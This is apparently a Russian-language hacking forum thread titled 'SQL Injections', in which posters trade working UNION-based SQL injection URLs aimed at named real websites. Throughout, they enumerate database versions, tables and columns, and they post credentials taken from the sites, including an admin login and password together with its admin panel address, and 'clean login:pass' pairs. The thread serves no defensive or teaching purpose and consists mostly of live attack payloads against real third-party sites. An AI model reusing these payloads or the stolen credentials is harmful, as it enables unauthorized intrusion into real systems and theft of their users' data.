SQL Инъекции

PHP:

http://www.proflit.ru/book.php?id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,version()/*

Первая на сегодня)))

 

в mysql.user доступа нет

Code:

http://www.rickardliljeberg.com/blog.php?itemID=1+and+1=-1+union+select+1,2,3,4,5,user(),7,8/*

 

2 Colkru
http://forum.antichat.ru/threadnav21336-85-10.html
пост номер 847 =)
upd//

Code:

http://www.iconla.com/gallery.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17+from+INFORMATION_SCHEMA.TABLES+limit+21,1/*

ничего интересного =\

 

Сорри, тогда вот 5-ая версия:

PHP:

http://www.sju.ca/people2.php?id=-1+union+select+1,2,table_name,version(),null,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

 

не смог колонки подобрать 0_о

 

колонка юзера - uname
пасс не подобрал

 

таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о

 

PHP:

http://www.uprava.org/section.php?id=34'
http://www.shamray.ru/show.php?id=31'


 

___

 

2 Spyder Да пусть выкладывает- тебе мешает чтоли? он выклдывает мы подбираем, какие проблемы
http://www.uprava.org/section.php?id=34+UNION+SELECT+1,2,3,4,5,6,VERSION()--

 

2KP0t_f!nd
колонки бы хоть подобрал..
http://www.uprava.org/section.php?id=-1+union+select+1,2,3,4,5,6,7/*
http://www.shamray.ru/show.php?id=-1+union+select+user()/* - вывод в титле

 

оффтоп
2 KPOT_f!nd
вот нафиг выкладывать ссылки с кавычками. Составляй запрос, а если не умеешь - читай статьи
хакеры млин
и не надо удалять

 

2Spyder
я бы посоветовал тебе почитать статьи
вот тебе все колонки

Code:

http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS/*

если имелось ввиду те таблицы что ты написал то вот пример одной из них

Code:

http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(97,100,109,105,110)/*

 

PHP:

http://www.negotiationrussia.ru/index.php?id=-1+union+select+version(),2/*

Таблицы не подобрал.

PHP:

http://prazdnik.com.ua/yslyga.php?id=-1+union+select+1,login,pass,4,5,6,7+from+user/*

логин: Zhuk_vv
пароль: голод
Админка: http://www.prazdnik.com.ua/admin

 

2 }{0TT@БЬ)Ч
спасибо что волнуешься за мои знания, но не стоит
2 Constantine
я не понимаю смысла просто 0о

jmajor:chicken
админка

есть возможность заливки картинок

 

Code:

http://www.kinovdom.ru/item.php?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

Code:

http://www.grandtour.ru/cgi-bin/hotels.cgi?country=%D4%F0%E0%ED%F6%E8%FF&id=-1+union+select+1,2,3,4,version(),user(),database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

 

Code:

http://www.ixbt.com/news/news.php?id=53979'

Инет глючит, не грузит странички дальше

 

Было это уже...

(http://www.ixbt.com/news/news.php?id=-99+union+select+1,2,0x707265766564203a44,4,5,6,7,8,9,10,11/*)

 

Ну извиняйте тогда

Code:

http://www.security-outlet.com/infopages/extended.php?id=-229+UNION+SELECT+1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17/*

 

Code:

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users/*

чистые login:рass

//upd:

Code:

http://www.proaudio.ru/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*

в общем, столбик с паролем называется pin или что-то вроде того, не могу подобрать.. user-поля нет.